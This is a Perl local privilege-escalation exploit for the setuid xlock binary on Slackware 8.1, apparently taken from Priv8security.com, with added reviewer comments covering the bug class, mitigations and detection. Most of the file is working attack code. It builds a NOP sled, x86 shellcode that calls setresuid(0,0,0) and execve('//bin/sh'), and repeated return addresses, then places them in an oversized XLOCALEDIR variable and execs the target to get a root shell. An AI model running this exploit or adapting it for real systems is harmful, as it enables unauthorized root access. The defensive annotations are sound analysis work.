#!/usr/bin/perl
######################################################
#Priv8security.com xlock local root exploit.
#
#    Tested on Slackware 8.1 only.
#    try offsets 0 , 100, 200, 300 ........
#####################################################
#
# Reviewer notes (read from the code below):
#   - The script fills the XLOCALEDIR environment variable with a string of
#     a little over 4 KB (NOP bytes, machine code, a repeated 32-bit address)
#     and then exec()s the binary named in $path with that environment.
#   - Bug class: an environment variable copied without a length check into a
#     fixed-size stack buffer. The title and the setresuid(0,0,0) payload imply
#     the target is installed setuid root.
#   - NOTE(review): the commented-out alternatives (xterm, xscreensaver)
#     suggest the unchecked copy sits in a shared X library rather than in
#     xlock itself; confirm against the vendor advisory.
#   - Mitigation: apply the vendor's X11 update, and drop the setuid bit from
#     the listed binaries until that is done. A non-executable stack and stack
#     address randomisation invalidate the fixed address this script uses.
#   - Detection: legitimate XLOCALEDIR values are short filesystem paths. A
#     setuid X client started with a multi-kilobyte XLOCALEDIR, or one holding
#     non-printable bytes such as long 0x90 runs, is a strong indicator.
#   - There is no `use strict` / `use warnings`; every variable is a package
#     global and $buffer is appended to without being initialised.

    # Binary that is exec()ed with the crafted environment.
    $path = '/usr/X11R6/bin/xlock';
    #$path = '/usr/X11R6/bin/xterm';
    #$path = '/usr/X11R6/bin/xscreensaver';

    # Raw machine code bytes. Per the author's note the first line calls
    # setresuid(0,0,0); the remaining bytes push the string "//bin/sh" and
    # issue syscall 0x0b (execve on Linux/x86, presumably the intended platform).
    $shellcode = # setresuid(0,0,0);
    "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80".
    "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
    "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

    # Hard-coded stack address. It is only meaningful on a system whose stack
    # layout is fixed, which is why the header says "Slackware 8.1 only".
    $retaddr = 0xbffff274;
    $nop = "\x90";    # x86 single-byte no-op, used as filler

    # Optional adjustment added to $retaddr; taken from the command line
    # verbatim, with no numeric validation.
    $offset = 0;
    if (@ARGV == 1) {
        $offset = $ARGV[0];
    }

    # Banner and usage are printed on every run, whether or not an argument
    # was supplied.
    print " Priv8security.com Slackware 8.1 xlock local root exploit!!\n";
    print " usage: $0 offset\n";
    print " Using address: 0x", sprintf('%lx',($retaddr + $offset)), "\n";

    # pack 'l' emits a signed 32-bit value in the host's native byte order.
    $new_ret= pack('l', ($retaddr + $offset));

    # Layout of the environment value: filler, machine code, ten copies of
    # the address, more filler. $buffer starts out undefined.
    $buffer .= $nop x (2052 - length($shellcode));
    $buffer .= $shellcode;
    $buffer .= $new_ret x 10;
    $buffer .= $nop x (2100 - length($shellcode));

    # The child inherits %ENV across exec(). `local` at file scope changes
    # nothing in practice here because exec() follows immediately.
    local($ENV{'XLOCALEDIR'}) = $buffer;

    # The return value of exec() is not checked, so a missing or
    # non-executable $path fails silently.
    exec("$path");